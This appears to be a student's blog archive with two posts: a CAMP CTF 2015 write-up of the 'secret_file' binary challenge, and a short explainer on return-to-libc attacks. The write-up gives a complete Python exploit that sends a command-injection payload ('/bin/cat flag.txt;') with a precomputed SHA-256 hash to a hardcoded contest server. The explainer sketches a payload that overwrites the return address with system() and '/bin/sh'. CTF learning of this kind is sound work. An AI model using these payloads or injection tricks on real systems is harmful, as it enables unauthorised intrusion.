Monthly Archives: August 2015

Rakesh Paruchuri 2:10 pm on August 16, 2015  

secret_file (150) CAMP CTF – 2015

This challenge is form camp-ctf 2015. This is the first time i have solved a real Binary Exploitation challenge. The given bianry is actually ELF 64-bit , dynamically linked and stripped. So i randomly gave large input and got segmentation fault at some point. So i though that must be some simple ROP and stared reversing it. I found some venerable functions like getline (Which doesn’t check the size of the input) and there was strcpy function called i was shocked “why the need of strcpy in the case you have getline”. So to check weather it is NX enabled or not, i used checksec for that.

RELRO           STACK CANARY      NX            PIE               RPATH         RUNPATH
Full RELRO    Canary found    NX enabled    PIE enabled     No RPATH   No RUNPATH

So i was shocked seeing FULL RELRO and Canary found for which you cannot use normal ROP. So thought there must something other than the overflowing part and started reversing it again. I found one “POPEN” function from which could spawn a shell. But to call that function you have to pass a “STRCMP” function. But the comparison was with some hash value.

Later I figured it out it was SHA_256 encryption and it encrypting was 256 bytes. But i didn’t knew which 256 bytes was those. After some brute force i found those were first 256 bytes of the input and was comparing form 284th byte of the input. i tried giving input same as that and that worked, I could call POPEN with the argument as, starting from 257th byte of the input. Later i tried giving “/bin/sh\x00” as argument but that didn’t work because there is STRRCHR function in the beginning which i didn’t notice. That function was actually searching for null byte. So that didn’t work and i wasted lot of time trying with other stuff. Later one of my senior gave me an idea, which was command injunction(;) which i tried reading flag and that worked… 🙂

And here is my exploit.


import struct
import socket

ip = "144.76.92.167"
port = 10105

soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect((ip, port))

payload = ''
payload += "A" * 256
payload += "/bin/cat flag.txt;"
payload += "B" * 9
payload += "e075f2f51cad23d0537186cfcd50f911ea954f9c2e32a437f45327f1b7899bbb" #This is the SHA_256 of 256 A's

soc.send(payload + '\n')
print soc.recv(1050)
Rakesh Paruchuri 9:45 am on August 5, 2015  

Return-to-libc Attak

Return to libc is also standard Buffer Overflow attack. But the in the case of Non Executable memory you cannot execute the malicious Shell code in the memory. So to over come barrier we use system() function, a generic return argument and a command argument, “/bin/sh”, and as no shellcode is required to use this method.

The technique is very simple you will have to just overflow the buffer and reach EIP(return address). Than you have to change the return address with system address and supply “/bin/sh” as argument. The exploit looks simple as this.

“AAAAAAAAAAAAA(Buffer)AAAAAAAAAAAAAAAAA” + “&system(EIP)” + “Fake_address” + “&/bin/sh”